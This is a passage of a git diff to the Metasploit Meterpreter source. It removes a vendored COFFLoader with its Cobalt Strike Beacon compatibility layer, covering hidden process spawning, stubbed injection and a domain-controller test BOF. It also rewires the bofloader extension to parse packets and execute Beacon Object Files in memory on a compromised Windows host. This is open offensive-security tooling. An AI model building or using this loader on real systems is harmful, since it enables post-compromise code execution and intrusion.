x86, char* buffer, int length) { - char* tempBufferPath = NULL; - if (buffer == NULL) { - return; - } - if (x86) { - tempBufferPath = "C:\\Windows\\"X86PATH"\\"DEFAULTPROCESSNAME; - #pragma warning(push) - #pragma warning(disable:4018) - if (strlen(tempBufferPath) > length) { - return; - } - memcpy(buffer, tempBufferPath, strlen(tempBufferPath)); - } - else { - tempBufferPath = "C:\\Windows\\"X64PATH"\\"DEFAULTPROCESSNAME; - if (strlen(tempBufferPath) > length) { - return; - } - memcpy(buffer, tempBufferPath, strlen(tempBufferPath)); - - } - #pragma warning(pop) - - return; -} - -BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo) { - BOOL bSuccess = FALSE; - if (x86) { - bSuccess = CreateProcessA(NULL, (char*)"C:\\Windows\\"X86PATH"\\"DEFAULTPROCESSNAME, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, sInfo, pInfo); - } - else { - bSuccess = CreateProcessA(NULL, (char*)"C:\\Windows\\"X64PATH"\\"DEFAULTPROCESSNAME, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, sInfo, pInfo); - } - return bSuccess; -} - -void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char * arg, int a_len) { - /* Leaving this to be implemented by people needing/wanting it */ - return; -} - -void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len) { - /* Leaving this to be implemented by people needing/wanting it */ - return; -} - -void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo) { - (void)CloseHandle(pInfo->hThread); - (void)CloseHandle(pInfo->hProcess); - return; -} - -BOOL toWideChar(char* src, wchar_t* dst, int max) { - /* Leaving this to be implemented by people needing/wanting it */ - return FALSE; -} - -char* BeaconGetOutputData(int *outsize) { - char* outdata = beacon_compatibility_output; - *outsize = beacon_compatibility_size; - beacon_compatibility_output = NULL; - beacon_compatibility_size = 0; - beacon_compatibility_offset = 0; - return outdata; -} - -#endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.h b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.h deleted file mode 100644 index e1681273..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.h +++ /dev/null @@ -1,66 +0,0 @@ -/* - * Cobalt Strike 4.X BOF compatibility layer - * ----------------------------------------- - * The whole point of these files are to allow beacon object files built for CS - * to run fine inside of other tools without recompiling. - * - * Built off of the beacon.h file provided to build for CS. - */ -#ifndef BEACON_COMPATIBILITY_H_ - /* Structures as is in beacon.h */ -extern unsigned char* InternalFunctions[29][2]; -typedef struct { - char * original; /* the original buffer [so we can free it] */ - char * buffer; /* current pointer into our buffer */ - int length; /* remaining length of data */ - int size; /* total size of this buffer */ -} datap; - -typedef struct { - char * original; /* the original buffer [so we can free it] */ - char * buffer; /* current pointer into our buffer */ - int length; /* remaining length of data */ - int size; /* total size of this buffer */ -} formatp; - -void BeaconDataParse(datap * parser, char * buffer, int size); -int BeaconDataInt(datap * parser); -short BeaconDataShort(datap * parser); -int BeaconDataLength(datap * parser); -char * BeaconDataExtract(datap * parser, int * size); - -void BeaconFormatAlloc(formatp * format, int maxsz); -void BeaconFormatReset(formatp * format); -void BeaconFormatFree(formatp * format); -void BeaconFormatAppend(formatp * format, char * text, int len); -void BeaconFormatPrintf(formatp * format, char * fmt, ...); -char * BeaconFormatToString(formatp * format, int * size); -void BeaconFormatInt(formatp * format, int value); - -#define CALLBACK_OUTPUT 0x0 -#define CALLBACK_OUTPUT_OEM 0x1e -#define CALLBACK_ERROR 0x0d -#define CALLBACK_OUTPUT_UTF8 0x20 - - -void BeaconPrintf(int type, char * fmt, ...); -void BeaconOutput(int type, char * data, int len); - -/* Token Functions */ -BOOL BeaconUseToken(HANDLE token); -void BeaconRevertToken(); -BOOL BeaconIsAdmin(); - -/* Spawn+Inject Functions */ -void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); -BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo); -void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); -void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); -void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); - -/* Utility Functions */ -BOOL toWideChar(char * src, wchar_t * dst, int max); -uint32_t swap_endianess(uint32_t indata); - -char* BeaconGetOutputData(int *outsize); -#endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_generate.py b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_generate.py deleted file mode 100644 index cb658935..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_generate.py +++ /dev/null @@ -1,96 +0,0 @@ -from struct import pack, calcsize -import binascii -import cmd - -class BeaconPack: - def __init__(self): - self.buffer = b'' - self.size = 0 - - def getbuffer(self): - return pack(" -#include - -//extern "C" BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD Reason, LPVOID LPV) { -//This one was only necessary if you were using a C++ compiler - -BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) -{ - - switch (fdwReason) - { - case DLL_PROCESS_ATTACH: - // Code to run when the DLL is loaded - break; - - case DLL_PROCESS_DETACH: - // Code to run when the DLL is freed - break; - - case DLL_THREAD_ATTACH: - // Code to run when a thread is created during the DLL's lifetime - break; - - case DLL_THREAD_DETACH: - // Code to run when a thread ends normally. - break; - } - - return TRUE; -} \ No newline at end of file diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/extension.json b/c/meterpreter/source/extensions/bofloader/COFFLoader/extension.json deleted file mode 100644 index 78c9f8fd..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/extension.json +++ /dev/null @@ -1,22 +0,0 @@ -{ - "name": "COFF Loader", - "command_name": "coff-loader", - "version": "0.0.0", - "extension_author": "lesnuages", - "original_author": "TrustedSec", - "repo_url": "https://github.com/sliverarmory/COFFLoader", - "help": "Load and execute Beacon Object Files (BOFs) in memory.", - "entrypoint": "LoadAndRun", - "files": [ - { - "os": "windows", - "arch": "386", - "path": "COFFLoader.x86.dll" - }, - { - "os": "windows", - "arch": "amd64", - "path": "COFFLoader.x64.dll" - } - ] -} \ No newline at end of file diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/test.c b/c/meterpreter/source/extensions/bofloader/COFFLoader/test.c deleted file mode 100644 index 8547d315..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/test.c +++ /dev/null @@ -1,44 +0,0 @@ -#include -#include -#include -#include -#include "beacon.h" - -DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); -DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID); -WINBASEAPI int __cdecl MSVCRT$printf(const char * __restrict__ _Format,...); - -char* TestGlobalString = "This is a global string"; -/* Can't do stuff like "int testvalue;" in a coff file, because it assumes that - * the symbol is like any function, so you would need to allocate a section of bss - * (without knowing the size of it), and then resolve the symbol to that. So safer - * to just not support that */ -int testvalue = 0; - -int test(void){ - MSVCRT$printf("Test String from test\n"); - testvalue = 1; - return 0; -} - -int test2(void){ - MSVCRT$printf("Test String from test2\n"); - return 0; -} - - -void go(char * args, unsigned long alen) { - DWORD dwRet; - PDOMAIN_CONTROLLER_INFO pdcInfo; - BeaconPrintf(1, "This GlobalString \"%s\"\n", TestGlobalString); - MSVCRT$printf("Test Value: %d\n", testvalue); - (void)test(); - MSVCRT$printf("Test ValueBack: %d\n", testvalue); - (void)test2(); - dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo); - if (ERROR_SUCCESS == dwRet) { - MSVCRT$printf("%s", pdcInfo->DomainName); - } - - NETAPI32$NetApiBufferFree(pdcInfo); -} diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/main.c index 410a4210..55bc23bf 100644 --- a/c/meterpreter/source/extensions/bofloader/main.c +++ b/c/meterpreter/source/extensions/bofloader/main.c @@ -7,6 +7,8 @@ #include "common_metapi.h" #include #include "main.h" +#include "beacon_compatibility.h" +#include "COFFLoader.h" // Required so that use of the API works. MetApi* met_api = NULL; @@ -14,8 +16,7 @@ MetApi* met_api = NULL; #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" -typedef int (*goCallback)(char *, int); -extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback); +extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize); extern char * BeaconGetOutputData(int *outsize); DWORD request_exec_cmd(Remote *remote, Packet *packet); @@ -27,13 +28,46 @@ Command customCommands[] = COMMAND_TERMINATOR }; +static int LoadAndRun(char* argsBuffer, uint32_t bufferSize) +{ +#if defined(_WIN32) + // argsBuffer: functionname |coff_data | args_data + datap parser; + char* functionName; + unsigned char* coff_data = NULL; + unsigned char* arguments_data = NULL; + int filesize = 0; + int arguments_size = 0; + + BeaconDataParse(&parser, argsBuffer, bufferSize); + functionName = BeaconDataExtract(&parser, NULL); + if (functionName == NULL) + { + return 1; + } + coff_data = (unsigned char*)BeaconDataExtract(&parser, &filesize); + if (coff_data == NULL) + { + return 1; + } + arguments_data = (unsigned char*)BeaconDataExtract(&parser, &arguments_size); + if (arguments_data == NULL) + { + return 1; + } + + return RunCOFF(functionName, coff_data, filesize, arguments_data, arguments_size); +#else + return 0; +#endif +} + /*! * @brief Handler for the generic command execution function. * @param remote Pointer to the \c Remote instance. * @param packet Pointer to the incoming packet. * @returns \c ERROR_SUCCESS */ - DWORD request_exec_cmd(Remote *remote, Packet *packet) { DWORD result = ERROR_SUCCESS; @@ -43,7 +77,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) char * output_data = NULL; char * args_buffer = NULL; - dprintf("[BOFLOADER] Inside request cmd\n"); + dprintf("[BOFLOADER] Inside request cmd"); if (NULL == response) { // Don't delete the response! @@ -52,19 +86,19 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) buffer_size = packet->payloadLength; args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); - dprintf("[BOFLOADER] got pkt contents\n"); + dprintf("[BOFLOADER] got pkt contents"); if (args_buffer != NULL) { - dprintf("[BOFLOADER] calling load and run\n"); - if (LoadAndRun(args_buffer, (uint32_t)buffer_size, NULL)) + dprintf("[BOFLOADER] calling LoadAndRun(%p, %u)", args_buffer, buffer_size); + if (LoadAndRun(args_buffer, (uint32_t)buffer_size)) { - dprintf("[BOFLOADER] load and run failed\n"); + dprintf("[BOFLOADER] load and run failed"); result = ERROR_BAD_COMMAND; } else { - dprintf("[BOFLOADER] getting out data\n"); + dprintf("[BOFLOADER] getting out data"); output_data = BeaconGetOutputData(&outdata_size); } @@ -95,9 +129,11 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) DWORD InitServerExtension(MetApi* api, Remote* remote) { + dprintf("[BOFLOADER] Loading..."); met_api = api; SET_LOGGING_CONTEXT(api) met_api->command.register_all(customCommands); + dprintf("[BOFLOADER] Loaded."); return ERROR_SUCCESS; diff --git a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj index 0427f0b1..7f8f6a82 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj +++ b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj @@ -1,476 +1,483 @@ - - - - - Debug - Win32 - - - Debug - x64 - - - r7_release - Win32 - - - r7_release - x64 - - - Release - Win32 - - - Release - x64 - - - - - - - - - - - - - - - {486B160F-C571-486D-AAC3-CB60CEA7CBDD} - ext_server_incognito - Win32Proj - ext_server_bofloader - - - - DynamicLibrary - MultiByte - false - v141_xp - - - DynamicLibrary - MultiByte - false - v141_xp - - - DynamicLibrary - MultiByte - false - v141_xp - - - DynamicLibrary - MultiByte - false - v141_xp - - - DynamicLibrary - MultiByte - false - v141_xp - - - DynamicLibrary - MultiByte - false - v141_xp - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - <_ProjectFileVersion>10.0.30319.1 - $(Configuration)\$(Platform)\ - $(Configuration)\$(Platform)\ - false - false - false - false - AllRules.ruleset - - - $(ProjectName).$(PlatformShortName) - - - - MaxSpeed - OnlyExplicitInline - false - Size - ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) - _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) - true - MultiThreaded - false - NotUsing - $(OutDir)\ - $(OutDir)\ - $(OutDir)\ - Level3 - ProgramDatabase - false - true - true - true - Async - - - %(AdditionalDependencies) - %(AdditionalLibraryDirectories) - - - false - false - - - Windows - - - - - false - - - $(OutDir)\ext_server_incognito.lib - MachineX86 - false - - - $(ProjectDir)..\..\source\def\extension.def - /ignore:4070 %(AdditionalOptions) - - - + + + + + Debug + Win32 + + + Debug + x64 + + + r7_release + Win32 + + + r7_release + x64 + + + Release + Win32 + + + Release + x64 + + + + + + + + + + + 4018;4047;4244;4267;%(DisableSpecificWarnings) + 4018;4047;4244;4267;%(DisableSpecificWarnings) + 4018;4047;4244;4267;%(DisableSpecificWarnings) + 4018;4047;4244;4267;%(DisableSpecificWarnings) + 4018;4047;4244;4267;%(DisableSpecificWarnings) + 4018;4047;4244;4267;%(DisableSpecificWarnings) + + + + + + {486B160F-C571-486D-AAC3-CB60CEA7CBDD} + ext_server_incognito + Win32Proj + ext_server_bofloader + + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + <_ProjectFileVersion>10.0.30319.1 + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + false + false + false + false + AllRules.ruleset + + + $(ProjectName).$(PlatformShortName) + + + + MaxSpeed + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;..\..\source\extensions\bofloader\COFFLoader;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + %(AdditionalLibraryDirectories) + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX86 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" -copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - - - - - MaxSpeed - OnlyExplicitInline - false - Size - ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) - _CRT_SECURE_NO_WARNINGS;DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) - true - MultiThreaded - false - NotUsing - $(OutDir)\ - $(OutDir)\ - $(OutDir)\ - Level3 - ProgramDatabase - false - true - true - true - Async - - - %(AdditionalDependencies) - %(AdditionalLibraryDirectories) - - - false - false - - - Windows - - - - - false - - - $(OutDir)\ext_server_incognito.lib - MachineX86 - false - - - $(ProjectDir)..\..\source\def\extension.def - /ignore:4070 %(AdditionalOptions) - - - - +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + + + MaxSpeed + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;..\..\source\extensions\bofloader\COFFLoader;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + %(AdditionalLibraryDirectories) + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX86 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" -copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" - - - - - MaxSpeed - OnlyExplicitInline - false - Size - ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) - _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) - true - MultiThreaded - false - NotUsing - $(OutDir)\ - $(OutDir)\ - $(OutDir)\ - Level3 - ProgramDatabase - false - true - true - true - Async - - - %(AdditionalDependencies) - %(AdditionalLibraryDirectories) - - - false - false - - - Windows - - - - - false - - - $(OutDir)\ext_server_incognito.lib - MachineX86 - false - - - $(ProjectDir)..\..\source\def\extension.def - /ignore:4070 %(AdditionalOptions) - - - +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" + + + + + MaxSpeed + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;..\..\source\extensions\bofloader\COFFLoader;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + %(AdditionalLibraryDirectories) + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX86 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" -copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - - - - - X64 - - - MinSpace - OnlyExplicitInline - false - Size - ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) - _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) - true - MultiThreaded - false - NotUsing - $(OutDir)\ - $(OutDir)\ - $(OutDir)\ - Level3 - ProgramDatabase - false - true - true - true - Async - - - %(AdditionalDependencies) - - - - - false - false - - - Windows - - - - - false - - - $(OutDir)\ext_server_incognito.lib - MachineX64 - false - - - $(ProjectDir)..\..\source\def\extension.def - /ignore:4070 %(AdditionalOptions) - - - +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + + + X64 + + + MinSpace + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;..\..\source\extensions\bofloader\COFFLoader;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + + + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX64 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" -copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - - - - - X64 - - - MinSpace - OnlyExplicitInline - false - Size - ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) - _CRT_SECURE_NO_WARNINGS;DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) - true - MultiThreaded - false - NotUsing - $(OutDir)\ - $(OutDir)\ - $(OutDir)\ - Level3 - ProgramDatabase - false - true - true - true - Async - - - %(AdditionalDependencies) - - - - - false - false - - - Windows - - - - - false - - - $(OutDir)\ext_server_incognito.lib - MachineX64 - false - - - $(ProjectDir)..\..\source\def\extension.def - /ignore:4070 %(AdditionalOptions) - - - - +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + + + X64 + + + MinSpace + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;..\..\source\extensions\bofloader\COFFLoader;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + + + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX64 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" -copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" - - - - - X64 - - - MinSpace - OnlyExplicitInline - false - Size - ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) - _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) - true - MultiThreaded - false - NotUsing - $(OutDir)\ - $(OutDir)\ - $(OutDir)\ - Level3 - ProgramDatabase - false - true - true - true - Async - - - %(AdditionalDependencies) - - - - - false - false - - - Windows - - - - - false - - - $(OutDir)\ext_server_incognito.lib - MachineX64 - false - - - $(ProjectDir)..\..\source\def\extension.def - /ignore:4070 %(AdditionalOptions) - - - +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" + + + + + X64 + + + MinSpace + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;..\..\source\extensions\bofloader\COFFLoader;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + + + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX64 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" -copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - - - - - - - - - +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + + + + + + + \ No newline at end of file diff --git a/c/meterpreter/workspace/meterpreter.sln b/c/meterpreter/workspace/meterpreter.sln index c7d76e87..453025ea 100644 --- a/c/meterpreter/workspace/meterpreter.sln +++ b/c/meterpreter/workspace/meterpreter.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 -# Visual Studio Version 16 -VisualStudioVersion = 16.0.30002.166 +# Visual Studio Version 17 +VisualStudioVersion = 17.0.32112.339 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcxproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}" EndProject @@ -78,24 +78,16 @@ Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 Debug|x64 = Debug|x64 - MinSizeRel|Win32 = MinSizeRel|Win32 - MinSizeRel|x64 = MinSizeRel|x64 r7_release|Win32 = r7_release|Win32 r7_release|x64 = r7_release|x64 Release|Win32 = Release|Win32 Release|x64 = Release|x64 - RelWithDebInfo|Win32 = RelWithDebInfo|Win32 - RelWithDebInfo|x64 = RelWithDebInfo|x64 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|Win32.ActiveCfg = Debug|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|Win32.Build.0 = Debug|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|x64.ActiveCfg = Debug|x64 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|x64.Build.0 = Debug|x64 - {87C64204-C82F-415D-AF45-D0B33BDFE39A}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {87C64204-C82F-415D-AF45-D0B33BDFE39A}.MinSizeRel|Win32.Build.0 = Release|Win32 - {87C64204-C82F-415D-AF45-D0B33BDFE39A}.MinSizeRel|x64.ActiveCfg = Release|x64 - {87C64204-C82F-415D-AF45-D0B33BDFE39A}.MinSizeRel|x64.Build.0 = Release|x64 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.r7_release|Win32.ActiveCfg = r7_release|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.r7_release|Win32.Build.0 = r7_release|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -104,18 +96,10 @@ Global {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|Win32.Build.0 = Release|Win32 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|x64.ActiveCfg = Release|x64 {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|x64.Build.0 = Release|x64 - {87C64204-C82F-415D-AF45-D0B33BDFE39A}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {87C64204-C82F-415D-AF45-D0B33BDFE39A}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {87C64204-C82F-415D-AF45-D0B33BDFE39A}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {87C64204-C82F-415D-AF45-D0B33BDFE39A}.RelWithDebInfo|x64.Build.0 = Release|x64 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|Win32.ActiveCfg = Debug|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|Win32.Build.0 = Debug|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|x64.ActiveCfg = Debug|x64 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|x64.Build.0 = Debug|x64 - {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.MinSizeRel|Win32.Build.0 = Release|Win32 - {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.MinSizeRel|x64.ActiveCfg = Release|x64 - {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.MinSizeRel|x64.Build.0 = Release|x64 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.r7_release|Win32.ActiveCfg = r7_release|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.r7_release|Win32.Build.0 = r7_release|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -124,18 +108,10 @@ Global 